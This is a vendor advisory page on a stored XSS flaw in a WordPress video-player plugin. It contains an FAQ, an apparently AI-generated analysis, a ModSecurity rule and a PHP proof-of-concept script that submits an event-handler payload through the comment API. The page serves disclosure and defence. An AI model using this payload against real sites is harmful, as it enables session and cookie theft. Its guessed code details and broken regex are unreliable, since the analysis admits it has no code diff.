What is CVE-2026-7556?

CVE-2026-7556 is a high-severity stored cross-site scripting (XSS) vulnerability in the FV Flowplayer Video Player plugin for WordPress. It allows unauthenticated attackers to inject malicious scripts into comments, which execute when users view the affected pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of comment text. If an administrator enables the ‘Parse Vimeo and YouTube links’ setting, an attacker can submit a comment containing a malicious payload that gets executed when the comment is displayed on the site.

Who is affected by this vulnerability?

All WordPress sites using FV Flowplayer Video Player plugin versions up to and including 7.5.49.7212 are affected. Site administrators should check their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the plugins section in your WordPress admin dashboard. Look for the FV Flowplayer Video Player plugin and verify if the version is 7.5.49.7212 or earlier.

What are the steps to fix this vulnerability?

The recommended fix is to update the FV Flowplayer Video Player plugin to version 7.5.50.7212 or later, where the vulnerability has been addressed. Additionally, ensure that proper output escaping is implemented in custom code if applicable.

What does the CVSS score of 7.2 indicate?

A CVSS score of 7.2 indicates a high severity vulnerability. This means that the vulnerability poses a significant risk to the security of the site, allowing attackers to execute scripts without authentication, which could lead to data theft or site compromise.

What practical risks does this vulnerability pose?

Successful exploitation can allow attackers to execute arbitrary JavaScript in the context of any user viewing the page. This can lead to session hijacking, unauthorized actions on behalf of users, and potential site-wide compromises, especially if a high-privilege user is affected.

What is the role of administrator comment approval?

While administrator approval of comments adds a layer of security, it does not fully mitigate the risk. An attacker can still exploit the vulnerability if the comment is approved, as the malicious payload will execute when the comment is viewed by any user.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can craft a comment containing a malicious payload disguised as a legitimate YouTube link. When the comment is processed by the plugin, the lack of proper escaping allows the injected script to execute when the comment is rendered on the page.

What coding practices should developers follow to prevent such vulnerabilities?

Developers should implement proper input validation and output escaping when handling user-generated content. Functions like esc_html(), esc_url(), and wp_kses() should be used to ensure that any data inserted into HTML contexts is safe from XSS attacks.

Are there any additional security measures recommended?

In addition to updating the plugin, consider implementing security plugins that monitor for XSS attempts, using web application firewalls, and educating users about safe commenting practices to further reduce the risk of exploitation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 10, 2026

CVE-2026-7556: FV Flowplayer Video Player <= 7.5.49.7212 Unauthenticated Stored Cross-Site Scripting via Comment Text PoC, Patch Analysis & Rule

CVE ID CVE-2026-7556

Plugin fv-wordpress-flowplayer

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 7.5.49.7212

Patched Version —

Disclosed June 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7556 (metadata-based):
This vulnerability is an unauthenticated stored cross-site scripting (XSS) issue in the FV Flowplayer Video Player plugin for WordPress, tracked as CVE-2026-7556 with a CVSS score of 7.2. The flaw affects all versions up to and including 7.5.49.7212. It allows attackers to inject arbitrary JavaScript into comment text, which executes whenever a victim user views the affected page. Exploitation requires the administrator to enable the non-default ‘Parse Vimeo and YouTube links’ (parse_comments) setting and requires the submitted comment to be approved by an administrator, but the attacker does not need any account privileges.

Root Cause:
Based on the CWE-79 classification and the description, the root cause is insufficient input sanitization and output escaping of comment text when the plugin processes Vimeo and YouTube links in comments. Atomic Edge analysis infers that the plugin likely parses comment content looking for media URLs and, when constructing the embedded player HTML, fails to properly encode or filter HTML tags or JavaScript event handlers embedded in the comment text. The description explicitly states the vulnerability occurs via the “comment text” and that the parsing is enabled by the ‘parse_comments’ setting. Without a code diff, we cannot confirm the exact vulnerable function, but the CWE implies that user-supplied text is reflected in an HTML context without escaping. The plugin probably uses a custom function like `parse_media_urls()` that builds HTML output using direct concatenation of comment fragments rather than employing WordPress’s safe output functions such as `esc_html()` or `wp_kses()`.

Exploitation:
An unauthenticated attacker submits a WordPress comment containing a malicious payload embedded within a disguised Vimeo or YouTube link. For example, the attacker could submit a comment with text like `[https://www.youtube.com/watch?v=dQw4w9WgXcQ” onmouseover=”alert(document.cookie)”]` or a string that breaks out of an attribute context. The plugin’s `parse_comments` handler will interpret this as a link, parse it, and then generate HTML for the embedded player. Because the plugin does not properly escape the link attributes, the injected `onmouseover` or other event handler becomes part of the generated HTML and is executed when a visitor’s browser renders the page. The attack vector is the standard WordPress comment submission endpoint (`/wp-comments-post.php` or the REST API endpoint `/wp/v2/comments`). The attacker sends a POST request with the `comment` parameter containing the crafted payload, along with other required comment fields (author, email, etc.). The payload remains dormant until an administrator approves the comment via the WordPress admin panel. After approval, any user visiting the page where the comment is displayed triggers the XSS.

Remediation:
The fix likely requires the plugin developers to implement proper output escaping of all comment-derived data before it is used in HTML generation. Specifically, when parsing comment text for Vimeo or YouTube links, the plugin should use `esc_url()` for any URL attributes and `esc_html()` or `wp_kses_post()` for any other text that is inserted into the page. The patched version, 7.5.50.7212, probably replaces direct HTML concatenation with safe WordPress functions like `wp_kses()` or uses `esc_attr()` for attribute values. Additionally, the plugin should consider adding a nonce check or capability check to the comment parsing function as a defense-in-depth measure. Administrator approval of comments is a secondary control but does not prevent the attack; the only reliable fix is correct output escaping at the code level.

Impact:
Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the context of any user who views the infected page. Since the CVSS vector shows a scope change (S:C) and low confidentiality and integrity impact (C:L/I:L), the attacker can perform actions on behalf of the victim, including stealing session cookies, reading nonce values, modifying page content via DOM manipulation, or performing actions as the logged-in user (e.g., creating new admin users if the victim is an administrator). This could lead to full site compromise if the victim is a high-privilege user. The attack does not require authentication, increasing its risk, but the requirement for admin comment approval and the non-default setting reduce the overall likelihood of exploitation in typical deployments.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@beginsWith /wp-json/wp/v2/comments" 
  "id:20267556,phase:2,deny,status:403,chain,msg:'CVE-2026-7556 via WordPress Comment REST API',severity:'CRITICAL',tag:'CVE-2026-7556'"
SecRule ARGS_POST:content "@rx (youtube.com|vimeo.com).*" 
  "chain"
SecRule ARGS_POST:content "@rx onw+s*=" 
  "chain"
SecRule ARGS_POST:content "@rx <script|javascript:|onerror|onclick|onmouseover|onload|onfocus" 
  "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-7556 - FV Flowplayer Video Player <= 7.5.49.7212 - Unauthenticated Stored Cross-Site Scripting via Comment Text

// Configuration: change these to match your target
$target_url = 'http://example.com'; // WordPress site URL (no trailing slash)
$post_id = 1;                        // ID of the post where the comment will be submitted

// Step 1: Create a malicious comment payload.
// This payload uses a YouTube link that appears legitimate but contains an onmouseover XSS vector.
// When the plugin parses the link, it will generate HTML like:
//   <a href="https://www.youtube.com/watch?v=VID" onmouseover="alert(document.cookie)">...</a>
// The comment body is crafted so that the URL is followed by a space and an event handler.
$malicious_comment = 'Test comment triggering XSS: https://www.youtube.com/watch?v=dQw4w9WgXcQ" onmouseover="alert(document.cookie)" ;';

// Required comment fields
$comment_data = array(
    'comment' => $malicious_comment,
    'author'  => 'XSS_Exploiter',
    'email'   => 'attacker@example.com',
    'url'     => '',
    'comment_post_ID' => $post_id,
);

// Step 2: Submit the comment via the WordPress REST API (no authentication needed for comments)
$api_url = $target_url . '/wp-json/wp/v2/comments';

$ch = curl_init($api_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($comment_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 201) {
    echo '[+] Comment submitted successfully. It now awaits admin approval.' . PHP_EOL;
    echo '[+] If the "Parse Vimeo and YouTube links" setting is enabled and an admin approves the comment,' . PHP_EOL;
    echo '[+] the XSS payload will execute for anyone viewing the post.' . PHP_EOL;
} elseif ($http_code === 403) {
    echo '[!] Comment submission blocked (403 Forbidden). The site may have a security plugin or comment restrictions.' . PHP_EOL;
} elseif ($http_code === 200) {
    // Some sites return 200 even on error; check response body
    echo '[!] Unexpected response (HTTP 200). Check the response body for errors.' . PHP_EOL;
    echo 'Response: ' . substr($response, 0, 500) . PHP_EOL;
} else {
    echo '[!] Failed to submit comment. HTTP code: ' . $http_code . PHP_EOL;
    echo 'Response: ' . substr($response, 0, 500) . PHP_EOL;
}
?>

Frequently Asked Questions

What is CVE-2026-7556?
Understanding the vulnerability
CVE-2026-7556 is a high-severity stored cross-site scripting (XSS) vulnerability in the FV Flowplayer Video Player plugin for WordPress. It allows unauthenticated attackers to inject malicious scripts into comments, which execute when users view the affected pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of comment text. If an administrator enables the ‘Parse Vimeo and YouTube links’ setting, an attacker can submit a comment containing a malicious payload that gets executed when the comment is displayed on the site.
Who is affected by this vulnerability?
Identifying vulnerable installations
All WordPress sites using FV Flowplayer Video Player plugin versions up to and including 7.5.49.7212 are affected. Site administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Verifying plugin versions
To check if your site is vulnerable, navigate to the plugins section in your WordPress admin dashboard. Look for the FV Flowplayer Video Player plugin and verify if the version is 7.5.49.7212 or earlier.
What are the steps to fix this vulnerability?
Mitigation and patching
The recommended fix is to update the FV Flowplayer Video Player plugin to version 7.5.50.7212 or later, where the vulnerability has been addressed. Additionally, ensure that proper output escaping is implemented in custom code if applicable.
What does the CVSS score of 7.2 indicate?
Understanding risk levels
A CVSS score of 7.2 indicates a high severity vulnerability. This means that the vulnerability poses a significant risk to the security of the site, allowing attackers to execute scripts without authentication, which could lead to data theft or site compromise.
What practical risks does this vulnerability pose?
Potential impacts of exploitation
Successful exploitation can allow attackers to execute arbitrary JavaScript in the context of any user viewing the page. This can lead to session hijacking, unauthorized actions on behalf of users, and potential site-wide compromises, especially if a high-privilege user is affected.
What is the role of administrator comment approval?
Security measures in place
While administrator approval of comments adds a layer of security, it does not fully mitigate the risk. An attacker can still exploit the vulnerability if the comment is approved, as the malicious payload will execute when the comment is viewed by any user.
How does the proof of concept demonstrate the issue?
Technical illustration of exploitation
The proof of concept illustrates how an attacker can craft a comment containing a malicious payload disguised as a legitimate YouTube link. When the comment is processed by the plugin, the lack of proper escaping allows the injected script to execute when the comment is rendered on the page.
What coding practices should developers follow to prevent such vulnerabilities?
Best practices for secure coding
Developers should implement proper input validation and output escaping when handling user-generated content. Functions like esc_html(), esc_url(), and wp_kses() should be used to ensure that any data inserted into HTML contexts is safe from XSS attacks.
Are there any additional security measures recommended?
Enhancing site security
In addition to updating the plugin, consider implementing security plugins that monitor for XSS attempts, using web application firewalls, and educating users about safe commenting practices to further reduce the risk of exploitation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations